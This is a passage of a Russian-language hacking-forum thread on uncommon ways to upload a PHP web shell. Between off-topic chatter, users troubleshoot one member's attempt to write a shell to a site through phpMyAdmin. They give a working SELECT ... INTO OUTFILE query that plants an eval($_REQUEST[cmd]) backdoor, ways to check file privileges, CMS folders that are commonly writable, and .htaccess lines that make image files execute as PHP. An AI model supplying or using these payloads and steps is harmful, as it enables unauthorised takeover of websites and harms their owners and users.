Авторские статьи Не стандартные способы заливки шелла

Discussion in 'Статьи' started by Osstudio, 11 Dec 2011.

  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Аналогично, продажу прикрыли. Теперь буду троллить.
     
  2. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    я думал проще не обращать внимания на них
    // я не совсем понимаю о чем разговор, но уверен что попал в точку
     
    _________________________
  3. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Блин, ну как мне ещё объяснить подобную фигню с base64 на русском языке? :D
    Драмчик иди танцуй :)
    Это хорошо :D
    Это ещё не конец запретов, просто всё потихоньку. ;)
     
    #123 Osstudio, 4 Apr 2012
    Last edited: 4 Apr 2012
  4. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    =* ))
    Я тебе в ПМ отписал на счёт интересного материала ;)
     
    #124 Osstudio, 4 Apr 2012
    Last edited: 4 Apr 2012
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Для тех, кто не в курсе - из base64 кодировки можно спокойно вырезать все "=" - и будет работать также прекрасно (запостенно только потому, что ТС удалил свои косяки, связанные с этим моментом, что не добавит образованности остальным)
     
    1 person likes this.
  6. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Я ннне вкурсе, посоны :D
    ЗЫ:
    Добавил про String.fromCharCode ;)
     
    1 person likes this.
  7. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    822
    Reputations:
    324
    Не надо загаживать тему, соблюдаем правила. Статусных пользователей это тоже касается. Для свободного общения есть болталка.
     
    2 people like this.
  8. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Также подредактировал про base64, за что огромное спасибо Pashkel'e =)
     
  9. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    заменил интересной темкой, с которой часто сталкиваются новички ;)
     
  10. kactetus

    kactetus New Member

    Joined:
    25 Feb 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    подскажите что делаю не так
    узнал путь
    /home/site.ru/html/phpmyadmin/
    проверил привилегии - есть (Y)
    выполняю запрос
    select '<?php eval($_REQUEST[cmd]); ?>' from mysql.user into outfile '/home/site.ru/html/phpmyadmin/shell.php'

    получаю ответ:
    Can't create/write to file '/home/site.ru/html/phpmyadmin/shell.php' (Errcode: 13)

    пробывал и в /home/site.ru/html/ все равно не хочет
     
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    прав нет на запись туда, очевидно.
     
  12. Sharp.Net

    Sharp.Net New Member

    Joined:
    28 Jul 2012
    Messages:
    39
    Likes Received:
    3
    Reputations:
    1
    Попробуй найти папку с изображениями, например она может быть тут /home/site.ru/html/images
    она обычно открыта на запись...
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Убедись что БД и сам сайт находится на одном хостинге!
     
    _________________________
  14. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    1) зачем тему апать?
    2)error code 13 -недостаточно прав на запить.Папка с изображениями редко имеет права на запись если уж права расставлены более менее правильно.
    3)Я в данном случае пытаюсь определить смс на который сайт крутится ,а дальше гугли ее архитектуру и ищи папки с правами 0777 по дефоту.
    Например если это phpbb=>cache ,store
    Wp=>upload,wp-content/themes/%тема%/
    И т.д.
     
  15. Sharp.Net

    Sharp.Net New Member

    Joined:
    28 Jul 2012
    Messages:
    39
    Likes Received:
    3
    Reputations:
    1
    тема требовала ответа, вот и ответил. Раз были уязвимости, какая может речь идти о грамотной настройке и распределении прав?!
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Неплохо бы сначала

    select '<?php eval($_REQUEST[cmd]); ?>' from mysql.user into outfile '/tmp/1.php'

    select load_file('/tmp/1.php')

    проверять...

    Если всё работает - то FILE_PRIV в норме. И вот только тогда начинать "угадывать" папку для заливки шелла
     
    _________________________
  17. Hummer

    Hummer Member

    Joined:
    31 Jul 2012
    Messages:
    43
    Likes Received:
    23
    Reputations:
    5
    Apparmor , либо нету прав на запись. Да и from mysql.user не нужен. Достаточно select '<?php eval($_REQUEST[cmd]); ?>' into outfile '/home/site.ru/html/phpmyadmin/shell.php'
     
    #137 Hummer, 3 Dec 2012
    Last edited: 3 Dec 2012
  18. airatos

    airatos New Member

    Joined:
    17 Dec 2010
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Че то этот метод у меня не работает. Просто картинка в браузере открывается и все. Как правильней надо делать?
     
  19. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Попытался залить через phpmyadmin к сожелению ошибка
    1045 - Access denied for user 'bd_hjgy'@'localhost' (using password: YES)
     
  20. C6H5CH3

    C6H5CH3 Member

    Joined:
    12 Dec 2008
    Messages:
    40
    Likes Received:
    9
    Reputations:
    1
    Может у тебя просто в .htaccess PHP отключен в каталоге с картинками или не прописано там расширение?

    Из той же статьи:
    Создаём файлик .htaccess, и вписываем в него следующее:
    PHP код:
    AddType application/x-httpd-php .jpg
    AddHandler application/x-httpd-php .jpg

    Сохраним.. там, где .jpg можете указать любой понравившийся вам формат, хоть .hacker
     
    #140 C6H5CH3, 28 Apr 2013
    Last edited: 28 Apr 2013